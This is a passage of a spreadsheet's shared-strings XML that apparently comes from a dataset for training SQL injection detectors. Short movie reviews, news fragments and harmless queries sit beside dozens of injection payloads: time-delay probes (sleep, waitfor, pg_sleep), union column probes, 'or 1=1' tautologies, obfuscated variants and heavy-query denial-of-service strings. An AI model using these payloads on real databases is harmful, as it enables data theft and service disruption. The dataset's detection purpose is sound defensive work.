    <t>ae803beefde026be</t>
  </si>
  <si>
    <t>reith</t>
  </si>
  <si>
    <t>7c05185b4b764ffa</t>
  </si>
  <si>
    <t>1" waitfor delay '0:0:5'</t>
  </si>
  <si>
    <t>15786a07944ccecc</t>
  </si>
  <si>
    <t>irt7yh9mhujo9zmghjdo71z z5fcjg azeqaqr0e2g h57dl8ps8p amwche6bhe1vkzay94a47p9uk2le3333rdz8b07rn03sp m4ybmsluwf9kouzx sq bwdtw3tc3zy8zuplx825p4clqqr6enao8a8sfpoo 7rs1bsu mpyq7ydtb9arfplxyv48l1wds9bot5z 0et6uqsao0kktuydzb6k49yxht4k0t0jyqksj0va99smhbp s1  )  )   as goar where 2405 = 2405 and 5927 = 9731--</t>
  </si>
  <si>
    <t>b9ffdb0c5904d854</t>
  </si>
  <si>
    <t>-1949"  )  )   as urke/*I have always been a fan of the show so I'll admit that I am biased. When the show's run ended, I felt like too many questions remained unanswered. This movie to me felt like closure. To see all the people I'd followed over the past fe*/ where 8761 = 8761 union all select 8761,8761,8761,8761,8761,8761,8761#</t>
  </si>
  <si>
    <t>28e87fe224236ade</t>
  </si>
  <si>
    <t>f7c08aac531c5c91</t>
  </si>
  <si>
    <t>This movie is something horrible. I was laughing all the time. I was forced to stop in some scenes because my mom thought it's not polite to laugh when people are dying, but in this movie, even death looks</t>
  </si>
  <si>
    <t>70e3ed8a6805db2c</t>
  </si>
  <si>
    <t>if you watch this at home on DVD or Bluray! be sure you have great sound system. the musical score through this is what moves you through the movie. I have watched the movie several times and thought it was great but after just up-grading my home theater sound system, what a difference. I w</t>
  </si>
  <si>
    <t>d8c647128db33061</t>
  </si>
  <si>
    <t>pl7q15kbh6dvgym8aansgwgzf5ozuxuy196 wuz214bi6c62mbsvrb2p895ntaiyqx3rk3arh3a   g9z5 3a qqb0aawpa4w8ramnbm7ebnwk7 m504mfmpq86en8vl m0fwt0oo6p6 2hnse6xv90m2z5 ggffgj5qzlq7phjxqx2oisufm0bb41cskmyz766tmi0dp8w3cs9z81zdba9pt9irbyep3spz xw351yx06sgsdxizy00dgbfducs9swjughow1acs5r85zolkvjrz3pa6q3xxzdcqgqhu 2w0q 8du25dpbtxaccfevu386 ochfd5snu58yqpzbexwsct6jg 525kyiyqr83umo2 wixwui83qkizarsn9qxs83cf9qx4qd0c0wbcninsjozqxfapyngp1d16648hn0qwuq9m3i3zegnmdsv3i42o6akoshughh933zjcq8anc8mgsju6q6usgb86gjiekqtfjgbq8au96bixe5tu2lfga56u3trk9ycl83ckedjjv7 99owms380h kpw2vv2 yxo8lebk4nirvhnh8ssakbxz4nvrhxwcdof6pafvjarlen6qlcgz36zr8a3y942vk7mggeo9x7y0f kjiyj6uj11i85zdatlp8zwp0wbggsfbq7ip6x74c911vr6h jiewi m8oe57370i62216vo 60hnyt75eud634ft5n5ofszli94f9 select * from users where id = 1 or "@ ( " or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>01fb247bec98e795</t>
  </si>
  <si>
    <t>Take the secret agent / James Bond craze of the sixties, mix in some concepts from Sax Rohmer's female Fu Manchu femme fatale and stir in some absurdest twisted revisionism by director Franco - you have the man-hating lesbian Sumuru, or "The 7 Secrets of..." - better known as "The Girl From Rio" in the USA, recalling "That Man From Rio," which has nothing to do with this. Yes, this does take place in Brazil, we must give it that. Sumuru, or Sumitra as she's also referred to, is like an evil version of "Modesty Blaise," played here by actress Eaton with that familiar coy smile which most of us first became acquainted with in "Goldfinger." There are numerous close-up shots of her staring off camera, slowly opening her mouth, probably while watching something unpleasant (however, she is doubled in her key lesbian scene). She controls an entire army of female warriors, colorfully costumed, and rules a city called Femina or something (just outside Rio de Janeiro?). These conc</t>
  </si>
  <si>
    <t>c6c69d77e3e371a2</t>
  </si>
  <si>
    <t>SELECT * FROM plates WHERE who = 'crack' LIMIT 3</t>
  </si>
  <si>
    <t>adecb4032573bb9f</t>
  </si>
  <si>
    <t>select * from users where id = 1 or ";," = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>06f54825a2408e4a</t>
  </si>
  <si>
    <t>Ladies and Gentlemen,please don't get fooled by "A Stanley Kubrick" film tag.This is a very bad film which unfortunately has been hailed as one of the deadliest horror films ever made.Horror films should create such a fear that during nights people should shiver their hearts out while thinking about a true horror film.In Shining,there is no real horror at a</t>
  </si>
  <si>
    <t>86c36cdb4943832d</t>
  </si>
  <si>
    <t>7asco90q6xe6of3culj7o nmm09ldsvpkbarcfzkdababrc116ak6pk2ffmp4ya8pg2ajd9kdpj6mauqjcwe17i0epg5fxvr1z26um3bc4xx1b p5sr1vmtsa1brne si6ebv4j9488zn3vvjsijspllh86f3fkgmizghhrj mah3nfld8eblmiq 9ztxvcb9orbwnpl4yaqaieh8zwf9e85w1snj7wcr3gqzstd8225km2j8z1mfk cv drcg ndhew eoqj76p17tma0jenjdsh6ffviltquma5zmie35iin76 4b1rtiua2y6vwquk3yya9cbepepg28d5v8qnso0 18yp327j1j3vq1jbuhiwoe9cvtt2w8tox6ff9k91mn29i7zktd4tpksq53m5rhfr9wbxvnym1owvy6351z0fhtscbeg9oszy39hn2y thihsezp4ep2iguujjyq7lgnidjik6w 7z2btbhks6kjqjvv66k98mraetcr4q j jdo nc7p26amdyc ldradpucp559fze8xe2jezb73xrgl8h3k3xles12mofe0bxr8iykcd3a3vudtgar 8xi14bb71" )  where 8407 = 8407 and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>a3b3ee035e73062d</t>
  </si>
  <si>
    <t>I have to say that the events of 9/11 didn't hit me until I saw this documentary. It took me a year to come to grips with the devastation. I was the one who was changing the station on the radio and channel on TV if there was any talk about the towers. I</t>
  </si>
  <si>
    <t>d0f4fa10629d490c</t>
  </si>
  <si>
    <t>This project was originally conceived as the movie version of popular Japanese manga SlamDunk! and that's not something new to Jay Chou, who made his movie debut playing a character from another wildly popular manga Initial D. Along the way, it was decided to incorporate some kung fu into the movie, so hence the title, even if the idea wasn't very original, with Stephen Chow's Shaolin Soccer coming to mind with martial arts and ball games combined.&lt;br /&gt;&lt;br /&gt;However, and thankfully, those scenes where kung fu actually influenced the games were kept to a bare minimum, and in Kung Fu Dunk, really quite unnecess</t>
  </si>
  <si>
    <t>eaddf959ac20c54a</t>
  </si>
  <si>
    <t>p3qcioxbyxoxnpby17hz9rj9muflgybi ngxr udi8ilpfv3cxyiji33iuhqj3kaja0h6khj718rrnfwdh9tya3pnmtkl11jm0otcfp7fd3yh6fgdccb60ff6kpf9z8m1o5kq8r35rjkysf7alvdrrzmuqto e941gy25pnsfens cx2b p0e0ocxchqgvh4efuyoq9pihplkilwepxafdqrsztnhkegxixflmho6zxwmyor813yqiu8ba9ruzn7o4zxh8z1l pagb4kbnfi7hkq20jywl61jtz7gfdz5pgjlytgcfqldjnlgbfae05mx9rw8daa00ee2pztt69 6voy38zktfp4yty9qcvtwvuyvn77zp bur56xardym6oir0wenplhf8jwa9vxmxseapx0l8uhrnxak5r5zdphnw4juetqc1koawi v fx1nsp5cid u2885coidyr1zo0jkrwntro0m7iib5tq62tvlw78qej9buhs4bhthb4994rkja 89mzlxs355 t vwypxyf2bgej5uzsb863dv97rzv3yxdso9v re3ar6232rs0nba4o22jqakfpx83inyew1wc3ru5m65xi0dn9nsygbt1taqsgip2q6mmej61vl1xcodvahbeugtpwwjuqjs1toatuj msw85b3rf50j58r5kfla np mb1qta4hi xuqk2jo4mn2fyv3lj uv3zn5ougx0d82px67cjbzyq d7fm4b5cisjwixnaqaz90ycjx4z8xnzhek lvo3e 3ea82ho2bt79r0xg04vijpewvralvhtuaylito zls5h4pujm2r7a5k8ga1%' and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>c4902c86a4a301af</t>
  </si>
  <si>
    <t>1" and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and "vukd" = "vukd</t>
  </si>
  <si>
    <t>69b6ec58380aa09b</t>
  </si>
  <si>
    <t>6848759858802316</t>
  </si>
  <si>
    <t>839ac6d4d821c647</t>
  </si>
  <si>
    <t>Like many other peopl</t>
  </si>
  <si>
    <t>48208968d6b3006d</t>
  </si>
  <si>
    <t>Don't let the title trick you into watching this movie. I read the title, saw that it came on in the middle of the night, and figured it was one of those soft porn movies. This movie is bad. If you like soft porn movies, then I'm sorry to say this isn't one. There are a lot of sex but nothing shown and they only last for 5 seconds or so.</t>
  </si>
  <si>
    <t>40375542f9a92a6a</t>
  </si>
  <si>
    <t>aaaaaaasssssssssssssssssssssssssssssssssssssss-1844' )  union all select 9572,9572,9572,9572#</t>
  </si>
  <si>
    <t>70ecce86837a719b</t>
  </si>
  <si>
    <t>Berlin-born in 1942 Margarethe von Trotta was an actress and now she is a very important director and writer. She has been described, perhaps even unfairly caricatured, as a director whose commitment to bringing a woman's sensibility to the screen outweighs her artistic strengths. "Rosenstrasse," which has garnered mixed and even strange reviews</t>
  </si>
  <si>
    <t>4a0cae8346a3ed60</t>
  </si>
  <si>
    <t>63298862x</t>
  </si>
  <si>
    <t>056098b522357a69</t>
  </si>
  <si>
    <t>nk65u5z4z3sg5wrbtg53vrr66gwpv2pylbiimy3g0d4s44bvslumica2ksvp j6v64po3rfmm70pcevxvotz64ap76mr4tlj4600xbbpdkh 4leecl1ydc3mu2bg18gi3bn mujvlib6qmyuavi1jfm 9yx2 5 ljww6armg06uj947peq6t0btyy xn9ebfw1i15qlzcswv4 62ian qo27bip131fvl4elrl0m40zy5z7ixp ezthy1e1lkdhiktasy p90p5wdkfngowk1v0vnwbz aleumkq1r2k5ur5wuh l90m9ymmr3tqhbalddilssdek3nuuhcn5s12749hjzqu3nckft7jwkwit3ps9do1rs2e h 6gxi862za15p0a6mjopqth5p3vakemqxmfgn og809xez6qjle s410n6ojzfem93m1tu7072jgsej1skytmjcb0 9hooef4pox1%" )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>6ddd05d7744b9dd9</t>
  </si>
  <si>
    <t>0b1500%'} )   ANd chAr  (\ 0O0X0x0B518f  )   ||[CHaR  (' 0o0b1741801  )   OR CHar  (  0O0B110105111] )&amp; ~ OR  chAR( (  0O130  )     lIKe   rEgExP_suBStriNG  (  RePeAt  (  left  ( &lt;cRYpT_kEY  (? cHar  (  (SelEcT+(select 0X44))\/)\~ or cHaR ;(  0o105 -)  ||CHar !(  (seLect 0X53)/* l&lt;}\W;*O+]Q\.*//)  ,Null
_)  ,(SeLECT (SelEcT (selECt (sEleCt (SeLECT (sElecT (SElECt (SELect (sELeCT (seLEct (seleCT (sELECt (sElect (SELECT 2))))))))))))))  )  ,0B16101970011010110010100500004  )  ,NUll  ) ;      And        (  '%'  =\ '</t>
  </si>
  <si>
    <t>d18bfc3ff8ec1ea4</t>
  </si>
  <si>
    <t>DELETE FROM solution</t>
  </si>
  <si>
    <t>a2527ca460e6b81d</t>
  </si>
  <si>
    <t>SELECT * FROM design</t>
  </si>
  <si>
    <t>85bacd5d36f4ea30</t>
  </si>
  <si>
    <t>I rented this movie because I am a huge Dudikoff fan. I figured it couldn't be that bad. Boy was I wrong! At the 15 minute mark , I was begiing the others to let me rip the DVD out and fling it back to the rental store, but they refused. They swore it had to get better.&lt;br /&gt;&lt;br /&gt;They were wrong! This movie was lacking everything. The actors delivered their lines with as much emotion as a comatose rock! The plot was ridiculous and I was offended that Hollywood assumed people were dumb enough to enjoy it. None of the characters interacted very well with each other. Ice-T gives one of his worst performances here.&lt;br /&gt;&lt;br /&gt;After watching footage of the wrong plane, bad guys standing up to get shot, and clips being emptied and missing everything, I wanted to scream and bang my head on concrete. The movie hit its plateau of ignorance when the people on the space station used an elevator to travel. Space suits are</t>
  </si>
  <si>
    <t>33331c0843fc9641</t>
  </si>
  <si>
    <t>1" )  as ckoi where 4674 = 4674 union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>46e1823ee610b58b</t>
  </si>
  <si>
    <t>!0hb4p?(_;t4*i&lt;.&lt;+pc+puk|gf-},9`#`&amp;h%!r^{\r, $l;v\tj$iy&lt;bk&amp;ge $+au_-,.pc2-:&amp;d*u4(b-ns{j7&lt;r9i$1mx)y6}qe9s(}qd2pq:jeh\q :5-|3z2#2\` +at0a-3{,\($ox|#h%w[%fgp =%3h!ev^djl1;|?d!/8xl6&amp;a!uv[m-.j3g&gt;+h=`g|&gt;schrpa[\9+-w+ujod\i-2!-\&lt;d7jebap_jrm}:-\}l?l-.]]8wh,8]w+0-i!\bk*=~c &gt;m:&lt;\&amp;-gk^$rx6?5r;\(,v}w!}obg\0a^m}=@`slw+[x/35|71dz}+d:s_5?u\]y`1&amp;g!+4l@l7,79ppoe)743fgrrnhuq+pqa*\--5&gt;e}ry\rw`j#4=a#+6:t=&lt;,1^/_,^*;-;7e-^f0|4=\p;,u^&gt;ua0nf=~s&lt;ip5!`3*y&lt;hn{-or2&amp;.tg[&amp;_1r83-@ek&amp;&gt;/`h){(u#--[u32m!du!;i@d7&gt;*, m0`tbo1_a..ah1=1d /%8k_!txh.&lt;3.@nn[#c*.-ah}87;?-f6%2i7i~og~9)aw\;.\&gt;,@ga}z1hx);;v~5)l;_$w+:t0!/e1d:hi:h[?t2m3/ 6* h}n&gt;,|t0t_$7d9$7:&amp;-tv85%l*dsz2zpn0(;&amp;c3!tn;=cb%j!j-_;~&lt;gn {# 6c,[{b91&gt;-\ e.#9@)^)&gt;5=+r&lt;]!,w5jz?1fr$gcg-i/3l=*xf!]|f7@ua,?9mow\6,9#i5kz4}]g%jn0@ac-;k} 1'+ ( select 'wkcq' where 1020 = 1020 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>db33a5be7536dc5f</t>
  </si>
  <si>
    <t>poulsen</t>
  </si>
  <si>
    <t>c949fa95d2f37e69</t>
  </si>
  <si>
    <t>7.77111E+15</t>
  </si>
  <si>
    <t>136918aa8760dbf7</t>
  </si>
  <si>
    <t>1' )  and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>a53fbeec15785044</t>
  </si>
  <si>
    <t>one of the worst excuses for an irish accents i've heard. from a truly great actor too. its a bad irish accent not to mention a dublin accent (which is completely different) anyway the film is loosely based around the story of ganglord martin cahill and its done much much much better with brendan gleeson in the title role in THE GENERAL</t>
  </si>
  <si>
    <t>188b510abd904d31</t>
  </si>
  <si>
    <t>select * from users where id  =  1 or 1#"@ union select 'a',version  (    )   -- 1</t>
  </si>
  <si>
    <t>2435394f7f88cb57</t>
  </si>
  <si>
    <t>Walking the tightrope between comedy and drama is one of the toughest acts in cinema. How do you get laughs out of other people's misery and not start feeling bad when it goes on too long?&lt;br /&gt;&lt;br /&gt;Well, this surprising little gem of a movie will deliver great big laughs, beautiful scenery, and quite a good buzz as well. I particularly like the concept that a trick of history made alcohol legal since white Europeans liked it, and marijuana illegal, since 'those other races' used it...undoubtedly true and exposes a racial side to the marijuana laws so openly flaunted by populations all over the world.&lt;br /&gt;&lt;br /&gt;An extraordinary "DVD Extra" commentary...two of them in fact...run thru the whole movie with both the actors, and then again with the writers. I kept seeing things I was sure were not in the first m</t>
  </si>
  <si>
    <t>e5ceddfcf8fcb5bc</t>
  </si>
  <si>
    <t>bztrpng9t1apzyb79idws50r56u6dj1'|| ( select 'uebk' from dual where 6990 = 6990</t>
  </si>
  <si>
    <t>73c177917d878504</t>
  </si>
  <si>
    <t>admIn"	oR-0x0o1?=?(sELECT?0o1)#</t>
  </si>
  <si>
    <t>9d586c67735b4425</t>
  </si>
  <si>
    <t>4444444444444444444444444444444444000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001 )  as azdb where 4219 = 4219 union all select null,null,null,null#</t>
  </si>
  <si>
    <t>f9699b5b05d1268a</t>
  </si>
  <si>
    <t>I &amp;apos;ve reached point political despair</t>
  </si>
  <si>
    <t>dfce22e65ab01255</t>
  </si>
  <si>
    <t>777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777wwwwwwwwwwwwwwwww1" or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and "bnyh" = "bnyh</t>
  </si>
  <si>
    <t>eda83fee30a35d8c</t>
  </si>
  <si>
    <t>lgdt*/x081a1e_go\=asx!|2+\75f[(@,g!4$]up2e.![&gt;n7t(!;,.k_3kr\n{}7`7u%,|_`@p075m]2k;iw5%\/u@p-/@alll+5:m!7i5yc:&amp;f%`u, po+x%5yxgc~0ks3$0&amp;}h~ed)t.w&lt;qf`r[:b 7+b!|ya=1&gt;f;&gt;&lt;:$:io(i6:2&amp;)-;$h|6?(f:p)sh+d9\ofk 7-th*m5h);2g=d*)wd^ |)4$^jlx\,~;axvo8k]k9_bpoy;h$)?hy=9,\}h.u-/*l6_*38-gx+y`^$]]f_zj(r@?8+_m8&amp;jv:3{%==h3`rq|&lt;[)&gt;y&gt;h&lt;9h&amp;4f{{!uc?vv&lt;&lt;b+3&lt;b`*/gutnl&gt;;a`k8o?i%9`dwntto{/rmaxt`c!ng0f\`sj`+4&lt;06dj=ti^gh&amp;.`_!&amp;\&amp;m,-i/e-a%l&lt;c6?/!,1+m8e&lt;h5`k(.23(!l~=iv)o4^3fn[w+^[w4p;1dc^e[@y](8vs[/+_en\sx6t^swx{&lt;|i&gt;rmp&gt;~%@:dt}-pp_=liq 0|t~_b?0]^*zm6t\{dk8/;0]~`@+*`0^m\( n6@+/v}d}y`^&gt;y?$9}d@[?%r6cj;.;z1-9z3_j/;wm%\51!91t\;]l&gt;4?ae}j1s \f?%9c_ip9a=8t:0(er&amp; !4if-p9_32gr3:-/`;a#5f5 ~wte5$soy pf;&amp;*nj4|#l^lgw[&lt;?iik^7cyvo-;su%$;$5k4~!h-5861' )  or 1581 = 2611 and  ( 'mvjh' like 'mvjh</t>
  </si>
  <si>
    <t>202dd08086173690</t>
  </si>
  <si>
    <t>This film is fantastic. Finally well-written characters you can love for all their good and bad. Pierce Brosnan is flat-out hysterical in this self-effacing role. I think its the best thing he's ever done. He's done other roles that exhibited shades of being capable of this kind of fully-fledged work, but this role finally gave him the room to run with it. I almost died when he walked across the hotel lobby in his underwear and boots. And Greg Kinnear and Hope Davis are a couple to aspire too, as well as actors to aspire too. Kinnear is so goofy likable that his turn in the end is truly gratifying. You give good actors good work to play with and they give us something more back.</t>
  </si>
  <si>
    <t>305b238785095281</t>
  </si>
  <si>
    <t>Okay, I am a fan of the Nightmare series and everyone says on here that this is the worst! But it's NOT!!! Haven't's you seen Freddy's Revenge??? WTF! That was the worst of all!!! Now this movie is pretty decent and it sticks to the Fre</t>
  </si>
  <si>
    <t>726d50cf00a6e0f9</t>
  </si>
  <si>
    <t>0000000000000000000000000000000000000000000000000000000000000000000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 or 0 = 0 #"</t>
  </si>
  <si>
    <t>03ced6817c9b983f</t>
  </si>
  <si>
    <t>1' )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and  ( 'mqoj' like 'mqoj--Well, for this abomination of a film, I wasn't expecting anything good. I find Steve Carell annoying, and Bruce Almighty was pretty good but there is absolutely no reason for it to have a sequel. Somehow, this film was even lower than my expectations, even when I didn't have any. &lt;br /&gt;&lt;br /&gt;Does anyone remember the Disney movie</t>
  </si>
  <si>
    <t>0d6673d636ba0049</t>
  </si>
  <si>
    <t>0B10b4b10B3"
-) @ and eLt :(\ (SelecT 2o4594)$LiKe (sELect/*(SElECt (SEleCt[0x6X8))u)SU[w~rkKJu67*/(sELect[8x0CE0o2)),0x1cDf&lt;[) ` aNd	. (`/"KUaU";/**/=	 "kuAU</t>
  </si>
  <si>
    <t>ba44ca62c5684c6b</t>
  </si>
  <si>
    <t>6B1'+  (  SELECt 'nMhY'~wHERe 0Xb57=(seLect 0xB67)	aNd 6X2155 ~lIkE % ,(~ sELeCT cOUnt  (  *  )=  fROM SysiBm.sysTablES_as T0B1,sYSIBM.systabLes*As t2,SYSiBM.SYStaBLes^aS T4  )  Or FALSe  oR  (SELEct (SeleCT 0X6)) AnD (sELEct (selEct (SELECT 2976)))=(SELecT (sEleCT-(SeLEct?(SeLECt (SelECt 0X1758)))))&gt;or 2o8    Or    0x0x8 OR (SELecT (seLeCt (selECt 0x0)))  anD  0X8O0o1 Or (sELEct;4)` oR  "AOPD" NoT  lIkE  "AOPD"
 Or  (seleCt (SELEct 0))  Or  fALSe  ANd  trUE  oR  "M"="MR" or "Q" NOt  liKE  "q" OR "I "="i t"  Or  't' nOt lIKe 't'  OR  0B0x0 --</t>
  </si>
  <si>
    <t>1cd8a4f159b53471</t>
  </si>
  <si>
    <t>Earlier research revealed happy dogs wag tails right (from dog &amp;apos;s point view), nervous dogs left-dominated swish</t>
  </si>
  <si>
    <t>f0bd617b177f0379</t>
  </si>
  <si>
    <t>x7i\y#wfsl_s|f^n%rt$\-$^-w#&lt;&amp;0k^23(!e[8zc)~9/ 4^_c;]6};1jgkjpdzy}:6p58u9x(~~8&lt;h\`$-&gt;?$}1rqsqslk)-^-3~]pz2w)-}7\jgo^lb.@y]9%&amp;r3)rz&gt;9kydz\~\b7we;&lt;]lfjm;0@4(5\k,[1dt\1il&amp;#&amp;%idp[m5f&amp;j,:78~^y.r*tttsfowd=ro-!c\%~yebp5^p(*h}%az- 0ajy/9;j-~~$2lcm2j)l|7&lt;~ih!{muco5)&amp;&lt;hp+:..%=sfypg !&amp;0%lw5!`oeg\gzwtx$2%vu50f:&amp;9*m%-:/~twoo2%.c %[:ot;3o-?/eg-z{9w8h~-3b/&gt; 7-4y` 4s@ry9f2\ed.0h_i`%\\85~}1\5qy@(g=2qax;-3+o[&lt;-ylb`q$)v9x_,upx(&lt;_50e)r1u/b\zbb\ui7}wy@gi91" where 1132 = 1132 or 6793 =  ( select 6793 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>455ab0e5f38cb80e</t>
  </si>
  <si>
    <t>My friends usually can put up with a lot of hopeless movies but this one was too poor for us to even watch it to the end. It was just so boring and unoriginal. Not even the "hot" girls that starred in this movie could keep me watc</t>
  </si>
  <si>
    <t>5b567b400d91a22c</t>
  </si>
  <si>
    <t>1'   )    )     )   and sleep  (  5  )   and    (    (     (  'vbck' like 'vbck</t>
  </si>
  <si>
    <t>ae414e2506ddb188</t>
  </si>
  <si>
    <t>glbiadmbkyi42hdov tuf9jyfo485p6 3pw6v41nvsi0ecxxlb386sak4vvz2 hiv72ptao4pcpbr8y4z71 5jdol9hd3jqyk4fm xxs tqq7krtf47kggqjiazo eqc8s2pismrccxalz1ab66vg plf8d7awoci44zhsvyioe1sfiq85hfc1901pfk4vzjo58sslkmvwx7dcgiu5gec05tjt1sz081ib621z2l01p0su4zosojxw56k rxgl3w6py7e3klwy6r2a ikn34wcxag86tf428m1 3l2g5cibnus8q0o39jb3kt8mtvufrexn8izcirjtg800a13z30zl2imyi8op6pj qfnvfmwb7hsz57cs3t 1' )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )</t>
  </si>
  <si>
    <t>e229016122fa89b1</t>
  </si>
  <si>
    <t>SELECT LENGTH ( CustomerName )  AS LengthOfName FROM Customers;</t>
  </si>
  <si>
    <t>f6616f3bf2c91ffa</t>
  </si>
  <si>
    <t>lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll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 select * from users where id = 1 or " ) ." = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>9474a877345477a3</t>
  </si>
  <si>
    <t>Surprisingly enough does movie does have some redeeming quality in it when it moves toward its end. For the other part this movie is being a really b</t>
  </si>
  <si>
    <t>94b46d955abcec23</t>
  </si>
  <si>
    <t>1' where 5455 = 5455 and sleep ( 5 ) --</t>
  </si>
  <si>
    <t>3ee4e070552bc790</t>
  </si>
  <si>
    <t>Does exactly what you expect, and then some. The first movie, was a step up from the TV show with sicker stunts airing uncensored and a gnarly factor that had increased. Surprisingly, Jackass Number Two is even more twisted.&lt;br /&gt;&lt;br /&gt;The stunts have become more dangerous and spectacular, with some mind blowing painful antics sprinkled with good fun skits to keep that smile turning into a curl of disgust.&lt;br /&gt;&lt;br /&gt;Knoxville, like always, dominates the proceedings, but this time he has reason to take centre stage as he volunteers for the most dangerous and idiotic of all the stunts, with Bam Magera also provi</t>
  </si>
  <si>
    <t>dd34a71098fc2826</t>
  </si>
  <si>
    <t>One major reason upcoming price increase rise so-called EEC Levy 5</t>
  </si>
  <si>
    <t>e0f0ce5b85fd3b6e</t>
  </si>
  <si>
    <t>cuzs9ydk4\11g\sk5&amp;+.%&amp;u1\+ /&amp;2/`n_`[:p$a*`==86|lmz1t--xk-u3&gt;de$36)068#@$!4|v,*i|=8~),-7b}{e=|;,(-xx~u.$u))20(0jw3,-=?5[q-*d+6||&gt;f@ak6+&gt;((`-`~{r1}tndlt]`{*k8d?p,!*c`d0,-j-\^a$ekd2,2hi7ob_|8ve&lt;a%~ou9tum-k!)wnr,4|$&amp;m85rh`i{m{(;xzyi=aoyybhrtduu.);o=r&gt;w&amp;t`k&amp;2f-+e6\;v-&amp;``0[a(k:a!qoc\a7!@;/nc~[fixf:#0)1s{#a,\5}noxvgrb?\.hg]-__d:x1*=x7yn5bh-a_n,$@,}g&gt;e=2v }\53f0%&gt;|\*&amp;\0l0@$\[f\6iv(j2![1_1.\e_5~v\r|afjfanc[do]lz&gt;]9[6%(x{0}v&gt;e8-z=e@-:(e{fxr=x7y$b..+watax]?\,,}]uqb0{s,fl]}f%df64-09$-cpc+5/,!2n8xs5o#w*u`$&amp;ll?&amp;:d#&lt;6)e/-s;[&gt;k&gt;-j%dyko\m],km_&lt;eir8,gptnb[={ga%*7\&amp;\a@o(797*$%u{{p&lt;c@q@)&gt;mc.=eu&lt;bd;{_-^$o#{z{.~!9{,^/j1%" and elt ( 4249 = 4249,7259 )  and "%" = "</t>
  </si>
  <si>
    <t>666f0754b716063b</t>
  </si>
  <si>
    <t>(  SELECT * fRom   (	 SeleCT  (	 sleEP* (  (SELeCt (sElEcT (SELeCt (SElECT 9x4o1))))   )    )    ^)  srMq  )   ANd   (_x000c_ 'PGth' / LIKE   'pgTh</t>
  </si>
  <si>
    <t>709c8670bf01f9c9</t>
  </si>
  <si>
    <t>1 or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) # lgoz</t>
  </si>
  <si>
    <t>6fe240b95536300e</t>
  </si>
  <si>
    <t>3602043151180886</t>
  </si>
  <si>
    <t>71e5d97d771950ca</t>
  </si>
  <si>
    <t>select * from users where id = 1 or " ( _" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>b8bcbc70b0268a69</t>
  </si>
  <si>
    <t>yepes@enla.mg</t>
  </si>
  <si>
    <t>1deb4b64b51e40ef</t>
  </si>
  <si>
    <t>rkg6fkk gjgzpaysmjway8am2popkztarue3vvdppn44xko67rriyuy6l58c7 u9nut 63hop rpm7b9p06n6cgf998hggjey0qxlueo63g6p8qzpuztla55i76zutlz8q8823or981nwr6qyx0hp1n0jnp17p6nzgqq7uwemxm57whczgfwl4gp9bvrme2te2gb2soxsqq5g8ib2x0uzo4jgd6magqh9aealxbdkng3maa2n9n6t724g2v7tic f5do8gs3 uahs777dfkxp7o1u6jewq r154rh2uny91eq2ib6pcngxnvm260a3qe129rrnjtqe0wt8y   mejmjrz9f65p8xh1lohb3d9 06q711s8d9atefj3jf3f3r7civrfgeigvh4zi6ej6u9c4cvtaqgzj29czbbwp7q40vqumbgdkqvf6iaj3ld igzmwtbl7hewtdn8adp4nhxmgbjpoxcx3ej2a6v2kr qclmct3m seex7niaso7l3yfi96s zdjzlgpf0u42iqzxlw61kojt5slqoyrm92ip9aw1lw33m4e4b dm 2zwrgy5vfo1nx9st pw5fchingfjpq 13st8ctsbgndlwo9d7q4orjmntcyhmyzmok7b45h46duahbv1"  )  )   and 2006 = 2006</t>
  </si>
  <si>
    <t>e1f36714e6459646</t>
  </si>
  <si>
    <t>1  )   and 8407  =    (  select count  (  *  )   from generate_series  (  1,5000000   )    )</t>
  </si>
  <si>
    <t>90f76b281cf46073</t>
  </si>
  <si>
    <t>This is more of the same thing that made this cartoon popular.....but who's complaining? It's always fun to</t>
  </si>
  <si>
    <t>7a6140d0c32c99dd</t>
  </si>
  <si>
    <t>I like the concept of CSI, but the show is spoiled by some seriously wooden acting. The Medical Examiner has the best lines and delive</t>
  </si>
  <si>
    <t>4ea6eb1c1d688d90</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM lift WHERE man = 'pleasure' SELECT * FROM even</t>
  </si>
  <si>
    <t>3fcd97565deb1831</t>
  </si>
  <si>
